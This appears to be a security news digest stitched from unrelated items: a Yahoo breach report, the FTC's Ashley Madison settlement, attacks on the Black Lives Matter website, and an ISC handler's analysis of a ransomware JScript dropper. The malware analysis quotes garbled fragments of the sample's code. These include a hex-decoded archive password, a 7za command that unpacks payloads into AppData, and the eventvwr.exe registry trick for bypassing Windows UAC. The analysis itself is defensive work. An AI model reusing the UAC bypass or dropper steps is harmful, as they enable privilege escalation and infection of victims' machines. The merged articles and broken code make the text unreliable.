Information Security News
by Sean Gallagher
On December 14, Yahoo announced that after an investigation into data provided by law enforcement officials in November, the company and outside forensics experts have determined that there was in fact a previously undetected breach of data from over 1 billion user accounts. The breach took place in August 2013, and is apparently distinct from the previous mega-breach revealed this fall—one Yahoo claims was conducted by a "state-sponsored actor".
The information accessed from potentially exposed accounts "may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers," Yahoo's chief information security officer Bob Lord reported in the statement issued by the company. "The investigation indicates that the stolen information did not include passwords in clear text, payment card data, or bank account information. Payment card data and bank account information are not stored in the system the company believes was affected."
It's not clear whether the data provided by law enforcement to Yahoo is connected to samples offered on an underground site this past August, particularly since Yahoo still remains unsure of how the user data was spirited out of its systems in the first place. But the breach news doesn't end there.
Ashley Madison, the dating website for married people seeking extramarital affairs, will pay the Federal Trade Commission (FTC) $1.6 million for its failure to protect the account information of 36 million users, for failing to delete account information after regretful users paid a $19 fee, and for luring users with fake accounts of “female” users.
In a press conference call, FTC Chairwoman Edith Ramirez said the commission had secured a $17.5 million settlement, but the company will only pay $1.6 million of that amount due to inability to pay. Ashley Madison's operators are also required to implement a data security program that will be audited by a third party, according to the settlement.
The website was hacked in August 2015, and the hack resulted in the release of user names, first and last names, hacked passwords, partial credit card data, street names, phone numbers, records of transactions, and e-mail addresses. In the wake of the hack, it was discovered that many people who paid the company $20 for a “Full Delete” had been bilked—Ashley Madison parent company Avid Life Media, now Ruby Corporation, had left that data on its servers for up to 12 months after the request had been made.
“Through our e-mails and our social media accounts we get death threats all the time,” said Janisha Gabriel. “For anyone who’s involved in this type of work, you know that you take certain risks.”
These aren’t the words of a politician or a prison guard but of a Web designer. Gabriel owns Haki Creatives, a design firm that specializes in building websites for social activist groups like Black Lives Matter (BLM)—and for that work strangers want to kill her.
When these people aren’t hurling threats at the site’s designer, they’re hurling attacks at the BLM site itself—on 117 separate occasions in the past six months, to be precise. They’re renting servers and wielding botnets, putting attack calls out on social media, and trialling different attack methods to see what sticks. In fact, it’s not even clear whether ‘they’ are the people publicly claiming to perform the attacks.
Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. Its always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques.
The JScript code was, of course, obfuscated but it was easily read by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection. This sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:
The bad guy was lazy (or smart?) and did not implement"> var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA(6D696E617331303030"> 6D696E617331303030.decode(hex)minas1000
The destination path is generated via multiple variables and is finally set to C:\Users\[user]\AppData\Local\, user being the victim"> C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\
Two new PE files are stored on the file system then executed:
What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a feature present in eventvwr.exe. This system tool runs as a high integrity process and uses HKCU / HKCR registry hives to start mmc.exe which opens finally eventvwr.msc. More information about this behaviour is available on the Microsoft website.
The trick is to create the registry entry that is checked by eventvwr.exe and to store the malicious binary (ODASTATACOTSTAODHOOD"> var WshShell = WScript.CreateObject (WScript.ShellWshShell.RegWrite (HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\, ODASTATACOTSTAODHOOD, REG_SZ"> var ZLGOZYLOLHONHTXTAOOR = environmentVars(WINDIR) + \\SYSTEM32\\+eventvwr.exeAAOGAODYSCSTSOAOLHAC = new ActiveXObject(Wscript.Shell
Letvar wshShell = new ActiveXObject(WScript.ShellwshShell.Run(REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f
More information about this technique to bypass UAC is available on github.com with a PoC script in Powershell.
If you receive interesting samples, feel free to share them! We always need fresh meat!
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant